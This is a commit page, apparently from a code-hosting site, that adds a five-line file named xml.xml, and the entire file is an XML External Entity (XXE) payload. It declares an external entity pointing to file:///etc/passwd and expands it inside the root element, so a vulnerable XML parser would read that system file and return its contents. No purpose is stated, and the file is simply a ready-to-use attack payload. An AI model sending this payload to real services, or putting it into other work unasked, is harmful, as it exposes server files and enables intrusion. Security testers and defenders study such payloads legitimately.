Hoseindb commited on
Commit
0d5c455
1 Parent(s): a075c13

Upload xml.xml

Browse files
Files changed (1) hide show
  1. xml.xml +5 -0
xml.xml ADDED
@@ -0,0 +1,5 @@
 
 
 
 
 
 
1
+ <?xml version="1.0"?>
2
+ <!DOCTYPE foo [
3
+ <!ENTITY xxe SYSTEM "file:///etc/passwd">
4
+ ]>
5
+ <foo>&xxe;</foo>